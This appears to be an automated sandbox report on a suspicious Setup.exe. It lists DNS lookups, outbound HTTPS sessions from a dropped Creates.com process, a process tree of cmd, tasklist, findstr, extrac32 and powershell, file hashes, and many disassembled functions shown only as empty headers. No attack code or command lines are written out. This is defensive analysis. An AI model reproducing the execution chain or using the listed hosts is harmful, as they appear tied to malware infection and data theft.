Jan 10, 2025 23:26:12.838200092 CET | 1.1.1.1 | 192.168.2.4 | 0xe02d | No error (0) | 185.161.251.21 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:26:13.913002968 CET | 1.1.1.1 | 192.168.2.4 | 0x300d | No error (0) | 172.67.162.153 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:26:13.913002968 CET | 1.1.1.1 | 192.168.2.4 | 0x300d | No error (0) | 104.21.15.122 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:26:14.791858912 CET | 1.1.1.1 | 192.168.2.4 | 0xd9c1 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49737 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:25:53 UTC | 264 | OUT | |
2025-01-10 22:25:53 UTC | 8 | OUT | |
2025-01-10 22:25:53 UTC | 1129 | IN | |
2025-01-10 22:25:53 UTC | 7 | IN | |
2025-01-10 22:25:53 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49738 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:25:53 UTC | 265 | OUT | |
2025-01-10 22:25:53 UTC | 78 | OUT | |
2025-01-10 22:25:54 UTC | 1137 | IN | |
2025-01-10 22:25:54 UTC | 232 | IN | |
2025-01-10 22:25:54 UTC | 1369 | IN | |
2025-01-10 22:25:54 UTC | 1369 | IN | |
2025-01-10 22:25:54 UTC | 1369 | IN | |
2025-01-10 22:25:54 UTC | 1369 | IN | |
2025-01-10 22:25:54 UTC | 1369 | IN | |
2025-01-10 22:25:54 UTC | 269 | IN | |
2025-01-10 22:25:54 UTC | 1369 | IN | |
2025-01-10 22:25:54 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49739 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:25:55 UTC | 282 | OUT | |
2025-01-10 22:25:55 UTC | 15331 | OUT | |
2025-01-10 22:25:55 UTC | 2825 | OUT | |
2025-01-10 22:25:56 UTC | 1133 | IN | |
2025-01-10 22:25:56 UTC | 20 | IN | |
2025-01-10 22:25:56 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49740 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:25:56 UTC | 274 | OUT | |
2025-01-10 22:25:56 UTC | 8735 | OUT | |
2025-01-10 22:25:57 UTC | 1133 | IN | |
2025-01-10 22:25:57 UTC | 20 | IN | |
2025-01-10 22:25:57 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49741 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:25:58 UTC | 277 | OUT | |
2025-01-10 22:25:58 UTC | 15331 | OUT | |
2025-01-10 22:25:58 UTC | 5069 | OUT | |
2025-01-10 22:25:59 UTC | 1135 | IN | |
2025-01-10 22:25:59 UTC | 20 | IN | |
2025-01-10 22:25:59 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49742 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:25:59 UTC | 275 | OUT | |
2025-01-10 22:25:59 UTC | 5435 | OUT | |
2025-01-10 22:26:00 UTC | 1137 | IN | |
2025-01-10 22:26:00 UTC | 20 | IN | |
2025-01-10 22:26:00 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49743 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:26:00 UTC | 277 | OUT | |
2025-01-10 22:26:00 UTC | 1212 | OUT | |
2025-01-10 22:26:01 UTC | 1128 | IN | |
2025-01-10 22:26:01 UTC | 20 | IN | |
2025-01-10 22:26:01 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49744 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:26:03 UTC | 280 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:03 UTC | 15331 | OUT | |
2025-01-10 22:26:04 UTC | 1133 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49745 | 172.67.223.109 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:26:05 UTC | 266 | OUT | |
2025-01-10 22:26:05 UTC | 113 | OUT | |
2025-01-10 22:26:12 UTC | 1133 | IN | |
2025-01-10 22:26:12 UTC | 218 | IN | |
2025-01-10 22:26:12 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49782 | 185.161.251.21 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:26:13 UTC | 201 | OUT | |
2025-01-10 22:26:13 UTC | 249 | IN | |
2025-01-10 22:26:13 UTC | 329 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.4 | 49791 | 172.67.162.153 | 443 | 7812 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:26:14 UTC | 204 | OUT | |
2025-01-10 22:26:14 UTC | 816 | IN | |
2025-01-10 22:26:14 UTC | 553 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN | |
2025-01-10 22:26:14 UTC | 1369 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 17:25:10 |
Start date: | 10/01/2025 |
Path: | C:\Users\user\Desktop\Setup.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 73'410'899 bytes |
MD5 hash: | 6D9439C5AFD2CB8DEEB2BD71A93E7828 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 17:25:11 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 17:25:11 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 17:25:12 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\tasklist.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7a0000 |
File size: | 79'360 bytes |
MD5 hash: | 0A4448B31CE7F83CB7691A2657F330F1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 17:25:12 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf20000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 17:25:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\tasklist.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7a0000 |
File size: | 79'360 bytes |
MD5 hash: | 0A4448B31CE7F83CB7691A2657F330F1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 17:25:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf20000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 17:25:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 17:25:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\extrac32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa40000 |
File size: | 29'184 bytes |
MD5 hash: | 9472AAB6390E4F1431BAA912FCFF9707 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 9 |
Start time: | 17:25:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf20000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 17:25:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 17:25:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 12 |
Start time: | 17:25:15 |
Start date: | 10/01/2025 |
Path: | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x60000 |
File size: | 947'288 bytes |
MD5 hash: | 62D09F076E6E0240548C2F837536A46A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Antivirus matches: |
|
Has exited: | true |
Target ID: | 13 |
Start time: | 17:25:15 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\choice.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x550000 |
File size: | 28'160 bytes |
MD5 hash: | FCE0E41C87DC4ABBE976998AD26C27E4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 17 |
Start time: | 17:26:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6b0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 18 |
Start time: | 17:26:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Execution Graph
Execution Coverage: | 18.6% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.7% |
Total number of Nodes: | 1525 |
Total number of Limit Nodes: | 34 |
Graph
Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B4900 Relevance: 2.6, Strings: 2, Instructions: 109COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B5E30 Relevance: .6, Instructions: 592COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B2F68 Relevance: .5, Instructions: 473COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077C1B1D Relevance: .1, Instructions: 140COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B33E0 Relevance: .1, Instructions: 109COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B33F0 Relevance: .1, Instructions: 102COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B2AA0 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B48F1 Relevance: .1, Instructions: 64COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B2A9F Relevance: .1, Instructions: 64COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02FFD01D Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02FFD005 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 048B5153 Relevance: .0, Instructions: 23COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077C08A0 Relevance: 10.3, Strings: 8, Instructions: 321COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077C14E8 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
